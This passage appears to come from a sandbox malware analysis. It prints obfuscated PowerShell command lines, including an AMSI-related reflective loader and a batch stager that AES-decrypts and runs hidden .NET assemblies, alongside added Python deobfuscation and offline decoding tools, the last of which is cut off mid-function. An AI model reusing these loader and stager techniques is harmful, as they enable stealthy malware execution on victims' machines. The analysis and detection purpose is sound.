Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[
Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'
S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[C
har](117)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[C
har](83)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
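The AMSI and process-creation lines above all carry the same loader, and the batch-stager lines that follow use a second trick on top of it: every string is assembled from ''+[Char](N)+'x' fragments, so 'amsi.dll', 'SOFTWARE' and the '$rbx-' registry value-name prefix never appear literally, and in the stager the real statements are hidden as '...blck...'.Replace('blck', '') literals handed to Invoke-Expression. The Python below is an added example written for this page; it is not code from the report or from the sample. It rewrites the logged text statically, with no execution, so the names can be read straight off the command lines and fed to detection rules. SAMPLE is constructed from fragments of the logged lines, with the second fragment cut off exactly where the log cuts it off.

```python
"""Static deobfuscator for the PowerShell string tricks logged in this report.

Added example, not code from the report or from the sample.  Three rewrites:
  1. fold ''+[Char](82)+'e'+... concatenation chains into one literal,
  2. apply the '...blck...'.Replace('blck', '') junk-token trick statically,
  3. inline Invoke-Expression '<literal>' so the hidden statement is readable.
Text in, text out; nothing is executed.
"""
import re

# One concatenation term: a single-quoted literal ('' escapes a quote) or [Char](N).
# Double-quoted strings interpolate variables, so they are deliberately left alone.
_TERM = r"(?:'(?:[^']|'')*'|\[Char\]\(\d+\))"
_CHAIN = re.compile(_TERM + r"(?:\s*\+\s*" + _TERM + r")*")
_CHAR = re.compile(r"\[Char\]\((\d+)\)")
_LIT = r"'((?:[^']|'')*)'"
_REPLACE = re.compile(_LIT + r"\.Replace\(" + _LIT + r",\s*''\)")
_IEX = re.compile(r"Invoke-Expression\s+" + _LIT + r"(\s*;)?")

# Constructed from fragments of the logged lines; the second fragment is cut off
# exactly where the log cuts it off.  Not a complete or runnable script.
SAMPLE = "\n".join([
    "$h=$y.Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');",
    "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''"
    "+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char]",
    "Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck"
    ".blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', '');",
])


def _unquote(body):
    return body.replace("''", "'")


def _quote(value):
    return "'" + value.replace("'", "''") + "'"


def _term_value(term):
    m = _CHAR.fullmatch(term)
    return chr(int(m.group(1))) if m else _unquote(term[1:-1])


def fold_chains(script):
    """'a'+[Char](98)+''+'c'  ->  'abc'  (a lone plain literal is left untouched)."""
    def repl(m):
        terms = re.findall(_TERM, m.group(0))
        if len(terms) == 1 and not _CHAR.fullmatch(terms[0]):
            return m.group(0)
        return _quote("".join(_term_value(t) for t in terms))
    return _CHAIN.sub(repl, script)


def strip_junk_tokens(script):
    """'<literal>'.Replace('<junk>', '')  ->  the literal with every <junk> removed."""
    return _REPLACE.sub(lambda m: _quote(_unquote(m.group(1)).replace(_unquote(m.group(2)), "")), script)


def inline_iex(script):
    """Invoke-Expression '<literal>';  ->  <literal>;"""
    def repl(m):
        body = _unquote(m.group(1))
        return body + (";" if m.group(2) and not body.rstrip().endswith(";") else "")
    return _IEX.sub(repl, script)


def deobfuscate(script):
    return inline_iex(strip_junk_tokens(fold_chains(script)))


def string_literals(script):
    """Distinct non-empty single-quoted literals left after deobfuscation, in order."""
    found = []
    for m in re.finditer(_LIT, deobfuscate(script)):
        value = _unquote(m.group(1))
        if value and value not in found:
            found.append(value)
    return found


if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(string_literals(SAMPLE))
```

Paste whole command lines in: deobfuscate returns the readable script and string_literals the quick IOC list (DLL names, registry paths, the $rbx- value-name prefix). Double-quoted strings are left alone because PowerShell interpolates them, and a fragment the log cut short is passed through unchanged rather than guessed at.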
        Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
        Source: unknownProcess created: cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
        Source: unknownProcess created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
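The cmd.exe lines above spell out how the batch stager unpacks its payloads: the PowerShell reads its own .bat file ($DuTVY), takes the first line that starts with ':: ', splits it on '\', and for each part does Base64 decode, AES-CBC/PKCS7 decrypt with the hard-coded key 'yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo=' (32 bytes, so AES-256) and IV 'WdcPQiNwNN818it8sRh8xg==' (function elgju), GZip decompress (VIxdo), then Assembly.Load and EntryPoint.Invoke (gYUmc). The Python below is an added example, not the malware's code and not taken from the report: it runs the same decode offline and stops before the load step, so the embedded .NET assemblies can be carved out of a captured b.bat or $rbx-CO2.bat for static analysis. AES-256 is implemented inline so the tool has no dependencies; build_carrier is the inverse pipeline and exists only to build the test input, which is a constructed fake PE and a short string rather than data from the sample.

```python
"""Offline decoder for the batch-file stager logged in this report (added example;
not the malware's code and not taken from the report).  It mirrors the stager's
decode path -- first ':: ' line of the .bat, split on '\\', Base64, AES-256-CBC with
PKCS7 and the key/IV hard-coded in the logged script, GZip -- and stops there
instead of calling Assembly.Load / EntryPoint.Invoke.  AES is written out inline
so the tool needs only the standard library; production code would use a vetted library.
"""
import base64
import gzip

KEY = base64.b64decode("yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo=")  # 32 bytes, from the log
IV = base64.b64decode("WdcPQiNwNN818it8sRh8xg==")                       # 16 bytes, from the log

# ---- minimal AES-256 (FIPS-197); state index = row + 4*column ----
def _xtime(a): return (a << 1) ^ (0x11B if a & 0x80 else 0)
def _mul(a, b):                      # multiplication in GF(2^8)
    r = 0
    while b:
        r, a, b = r ^ (a if b & 1 else 0), _xtime(a), b >> 1
    return r
_xor = lambda a, b: [x ^ y for x, y in zip(a, b)]
SBOX, INV_SBOX = [0] * 256, [0] * 256
for _x in range(256):                # S-box = affine transform of the multiplicative inverse
    _inv = _s = 0 if _x == 0 else next(y for y in range(1, 256) if _mul(_x, y) == 1)
    for _ in range(4):
        _inv = ((_inv << 1) | (_inv >> 7)) & 0xFF
        _s ^= _inv
    SBOX[_x], INV_SBOX[_s ^ 0x63] = _s ^ 0x63, _x
def _expand(key):                    # AES-256 key schedule: 60 words -> 15 round keys
    w, rcon = [list(key[i:i + 4]) for i in range(0, 32, 4)], 1
    for i in range(8, 60):
        t = w[i - 1][:]
        if i % 8 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0], rcon = t[0] ^ rcon, _xtime(rcon)
        elif i % 8 == 4:
            t = [SBOX[b] for b in t]
        w.append(_xor(w[i - 8], t))
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]
def _shift_rows(s, inv=False):
    return [s[r + 4 * (((c - r) if inv else (c + r)) % 4)] for c in range(4) for r in range(4)]
def _mix_columns(s, inv=False):
    m = (14, 11, 13, 9) if inv else (2, 3, 1, 1)
    return [_mul(m[0], s[4 * c + r]) ^ _mul(m[1], s[4 * c + (r + 1) % 4])
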